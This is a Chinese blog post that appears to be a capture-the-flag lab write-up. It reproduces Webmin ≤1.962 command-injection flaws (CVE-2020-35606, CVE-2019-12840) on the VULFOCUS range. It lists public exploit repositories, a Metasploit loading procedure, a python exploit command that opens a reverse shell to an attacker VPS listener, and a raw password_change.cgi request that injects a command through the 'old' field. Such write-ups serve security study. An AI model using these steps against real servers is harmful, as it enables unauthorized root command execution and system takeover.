Webmin命令执行
介绍
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。
漏洞原理
Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用root权限执行任意命令。
影响版本
Webmin 1.962版本及其之前的版本。
漏洞复现
采用VULFOCUS在线靶场进行漏洞复现。
打开靶场所给地址。
出现错误,在url添加https://即可。
webmin的默认密码是root/password(靶场已给出),登陆成功,webmin版本为1.962。(末班车)
此漏洞可通过脚本来探测是否存在(脚本需在MSF内使用)
https://github.com/puckiestyle/CVE-2020-35606
脚本导入MSF
此处我使用的kali内置的msf,存放目录
/usr/share/metasploit-framework/modules/
使用reload_all
命令导入。
use 4
配置完成后,check进行漏洞探测,漏洞存在。
在进行攻击利用的时候,记得填入webmin的账号和密码(上图)。
Run结果—G~。
后来在网上搜罗了大半天,终于找到希望的脚本,CVE-2019-12840。
https://github.com/KrE80r/webmin_cve-2019-12840_poc
更改121行的端口(默认端口是10000)
CVE-2019-12840使用命令
python2 CVE-2019-12840.py -u https://targetip(一定不要加端口) -U username -P password -lhost VPSIP -lport nc监听端口
反弹成功,拿到flag。
第二种方法—直接手撸,访问password_change.cgi
https://123.58.236.76:58682/password_change.cgi
user=rootxx&pam=&expired=2&old=ls /tmp&new1=test2&new2=test2
原文始发于微信公众号(三零二):CVE-2020-35606
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论